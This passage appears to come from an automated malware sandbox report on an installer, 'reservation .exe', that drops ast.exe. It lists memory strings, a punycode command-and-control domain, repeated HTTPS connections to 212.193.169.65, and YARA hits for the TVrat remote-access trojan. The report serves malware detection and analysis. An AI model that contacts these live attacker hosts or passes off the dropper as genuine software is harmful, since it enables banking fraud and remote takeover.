                          Source: ast.exe, 0000000A.00000003.3007753831.0000000005C36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443ata
                          Source: ast.exe, 0000000A.00000003.2895297263.0000000005C36000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2914306157.0000000005C39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443dm
                          Source: ast.exe, 0000000A.00000003.2784033119.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2807629713.0000000005C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443g
                          Source: ast.exe, 0000000A.00000003.3265137068.0000000005C20000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3267513698.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3299966293.0000000005C23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443g1
                          Source: ast.exe, 0000000A.00000002.3306161257.0000000000D73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443g=
                          Source: ast.exe, 0000000A.00000003.3007986036.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3321452635.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3299966293.0000000005C23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443gD
                          Source: ast.exe, 0000000A.00000003.3183555638.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2895606355.0000000005C1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443gE
                          Source: ast.exe, 0000000A.00000003.2895606355.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265137068.0000000005C20000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3073381090.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3267513698.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2914485845.0000000005C1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443gK
                          Source: ast.exe, 0000000A.00000003.3183555638.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3007986036.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3321452635.0000000005C1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443gW
                          Source: ast.exe, 0000000A.00000002.3321452635.0000000005C1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443gh
                          Source: ast.exe, 0000000A.00000003.3183555638.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443gt
                          Source: ast.exe, 0000000A.00000003.3299966293.0000000005C23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443gz
                          Source: ast.exe, 0000000A.00000003.2784241804.0000000005BFB000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3320611390.0000000005BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443ln
                          Source: ast.exe, 0000000A.00000003.2895297263.0000000005C36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443lnJm&
                          Source: ast.exe, 0000000A.00000003.2784241804.0000000005BFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443lnd
                          Source: ast.exe, 0000000A.00000003.3073381090.0000000005C35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443lndm
                          Source: ast.exe, 0000000A.00000003.3034764637.0000000005C3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443lnmm
                          Source: ast.exe, 0000000A.00000002.3320611390.0000000005BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443lnw#
                          Source: ast.exe, 0000000A.00000003.3073381090.0000000005C35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443mm
                          Source: ast.exe, 0000000A.00000002.3306161257.0000000000DBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aiI
                          Source: ast.exe, 0000000A.00000003.2784241804.0000000005BFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aiZ
                          Source: ast.exe, 0000000A.00000003.2895606355.0000000005BFC000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2807379986.0000000005C00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aid
                          Source: ast.exe, 0000000A.00000002.3307636336.0000000002F24000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aid003
                          Source: ast.exe, 0000000A.00000003.3183555638.0000000005BFB000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3073381090.0000000005C35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aidll
                          Source: ast.exe, 0000000A.00000002.3322683873.0000000005C68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aidllm
                          Source: ast.exe, 0000000A.00000002.3307636336.0000000002F24000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aie
                          Source: ast.exe, 0000000A.00000002.3307636336.0000000002F24000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aie03
                          Source: ast.exe, 0000000A.00000002.3307636336.0000000002F24000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aieY
                          Source: ast.exe, 0000000A.00000003.2914715160.0000000005BFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aierW
                          Source: ast.exe, 0000000A.00000002.3307636336.0000000002F24000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aiexe03
                          Source: ast.exe, 0000000A.00000002.3325606674.000000000889D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aifgGu
                          Source: ast.exe, 0000000A.00000003.3073381090.0000000005C35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aiget
                          Source: ast.exe, 0000000A.00000002.3324808318.0000000006D4D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aigiGu
                          Source: ast.exe, 0000000A.00000002.3325486557.0000000007E9D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aiheGu
                          Source: ast.exe, 0000000A.00000002.3307636336.0000000002EF2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aii
                          Source: ast.exe, 0000000A.00000002.3322683873.0000000005C68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aim;
                          Source: ast.exe, 0000000A.00000003.3183555638.0000000005BFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aink
                          Source: ast.exe, 0000000A.00000003.3007753831.0000000005C36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ainkEx
                          Source: ast.exe, 0000000A.00000003.2914715160.0000000005BFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ait.exe
                          Source: ast.exe, 0000000A.00000003.3034764637.0000000005C3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ait.exeje
                          Source: ast.exe, 0000000A.00000003.3183555638.0000000005C68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aai
                          Source: ast.exe, 0000000A.00000003.3265864125.0000000005C69000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265137068.0000000005C68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--8X
                          Source: reservation .exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                          Source: xcopy.exe, 00000008.00000003.2451867441.0000000003108000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454713118.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2459594021.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455429869.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000313E000.00000004.00000020.00020000.00000000.sdmp, is-RFQHO.tmp.4.dr, is-8MMT6.tmp.4.drString found in binary or memory: https://sectigo.com/CPS0
                          Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0B
                          Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0C
                          Source: xcopy.exe, 00000008.00000003.2451867441.0000000003108000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454713118.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2459594021.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455429869.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000313E000.00000004.00000020.00020000.00000000.sdmp, is-RFQHO.tmp.4.dr, is-8MMT6.tmp.4.drString found in binary or memory: https://sectigo.com/CPS0D
                          Source: reservation .exeString found in binary or memory: https://www.globalsign.com/repository/0
                          Source: ast.exe, 0000000A.00000003.2895606355.0000000005BD1000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265017891.0000000005C86000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3299122357.0000000005C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0D
                          Source: reservation .exe, 00000000.00000003.2037832146.000000007FB40000.00000004.00001000.00020000.00000000.sdmp, reservation .exe, 00000000.00000003.2037382869.0000000002640000.00000004.00001000.00020000.00000000.sdmp, reservation .tmp, 00000002.00000000.2039348105.0000000000401000.00000020.00000001.01000000.00000004.sdmp, reservation .tmp.3.drString found in binary or memory: https://www.innosetup.com/
                          Source: xcopy.exe, 00000008.00000003.2459594021.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000312B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3330125779.000000006BCA0000.00000002.00000001.01000000.00000014.sdmp, ast.exe, 0000000A.00000002.3336427984.000000006C722000.00000002.00000001.01000000.00000013.sdmp, is-RFQHO.tmp.4.drString found in binary or memory: https://www.openssl.org/H
                          Source: xcopy.exe, 00000008.00000003.2457697380.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/docs/faq.html
                          Source: reservation .exe, 00000000.00000003.2037832146.000000007FB40000.00000004.00001000.00020000.00000000.sdmp, reservation .exe, 00000000.00000003.2037382869.0000000002640000.00000004.00001000.00020000.00000000.sdmp, reservation .tmp, 00000002.00000000.2039348105.0000000000401000.00000020.00000001.01000000.00000004.sdmp, reservation .tmp.3.drString found in binary or memory: https://www.remobjects.com/ps
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50135 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50147
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50150
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50156
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50159
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49979 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49982 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49985 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49988 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49991 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49994 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49997 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50000 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50003 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50006 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50009 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50012 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50015 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50021 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50024 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50027 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50030 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50033 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50036 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50039 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50042 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50045 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50048 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50051 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50054 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50057 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50060 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50063 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50066 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50069 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50072 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50078 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50081 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50084 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50087 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50090 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50093 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50096 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50099 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50102 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50105 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50108 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50111 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50114 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50117 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50120 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50123 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50126 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50129 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50132 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50135 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50141 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50144 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50147 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50150 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50153 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50156 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50159 version: TLS 1.2
                          Source: Yara matchFile source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: Process Memory Space: ast.exe PID: 3380, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\fat\ast.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\qilq\is-5KIJJ.tmp, type: DROPPED

                          E-Banking Fraud

                          barindex
                          Yara detected TVrat
                          Source: Yara matchFile source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: ast.exe PID: 3380, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\fat\ast.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\qilq\is-5KIJJ.tmp, type: DROPPED
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B6C8010 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,10_2_6B6C8010
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B6EFEF010_2_6B6EFEF0
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B6C2D2010_2_6B6C2D20
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B6C738010_2_6B6C7380
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B700A4010_2_6B700A40
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B6E117010_2_6B6E1170
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B6CF95010_2_6B6CF950
